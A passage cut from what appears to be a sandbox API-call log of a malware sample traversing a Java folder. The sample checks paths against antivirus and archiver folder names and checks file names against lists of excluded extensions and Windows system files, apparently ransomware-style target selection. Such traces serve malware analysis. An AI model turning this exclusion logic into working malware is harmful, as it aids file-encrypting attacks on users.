lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.099] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0091.099] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.100] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0091.100] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.100] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0091.100] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.100] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0091.100] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.100] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0091.100] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.100] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0091.100] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.100] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0091.100] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.100] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0091.100] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.100] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0091.100] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\", cchLength=0x2e | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\") returned 0x2e [0091.100] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.105] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.105] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.105] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0091.105] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchLength=0x36 | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\CURSORS\\") returned 0x36 [0091.105] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0091.105] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchLength=0x36 | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\IMAGES\\CURSORS\\") returned 0x36 [0091.105] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\*.*", lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 0x2b7048 [0091.143] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0091.143] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="PROPERTIES", cchCount2=10) returned 1 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 1 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 1 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 1 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 1 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 1 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="PROPERTIES", cchCount2=10) returned 3 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="PROPERTIES", cchCount2=10) returned 1 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="PROPERTIES", cchCount2=10) returned 1 [0091.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 1 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 1 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="CURSORS.PROPERTIES", cchCount2=18) returned 3 [0091.144] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="GIF", cchCount2=3) returned 1 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="INVALID32X32.GIF", cchCount2=16) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="INVALID32X32.GIF", cchCount2=16) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="INVALID32X32.GIF", cchCount2=16) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="INVALID32X32.GIF", cchCount2=16) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="INVALID32X32.GIF", cchCount2=16) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="INVALID32X32.GIF", cchCount2=16) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="INVALID32X32.GIF", cchCount2=16) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="INVALID32X32.GIF", cchCount2=16) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="INVALID32X32.GIF", cchCount2=16) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="INVALID32X32.GIF", cchCount2=16) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="INVALID32X32.GIF", cchCount2=16) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="INVALID32X32.GIF", cchCount2=16) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="INVALID32X32.GIF", cchCount2=16) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="INVALID32X32.GIF", cchCount2=16) returned 3 [0091.145] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="GIF", cchCount2=3) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="WIN32_COPYDROP32X32.GIF", cchCount2=23) returned 3 [0091.146] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="GIF", cchCount2=3) returned 1 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="GIF", cchCount2=3) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="WIN32_COPYNODROP32X32.GIF", cchCount2=25) returned 3 [0091.147] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19e7a0 | out: lpFindFileData=0x19e7a0) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="GIF", cchCount2=3) returned 1 [0091.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="GIF", cchCount2=3) returned 3 [0091.147] CompareStringW (Locale=0x400, 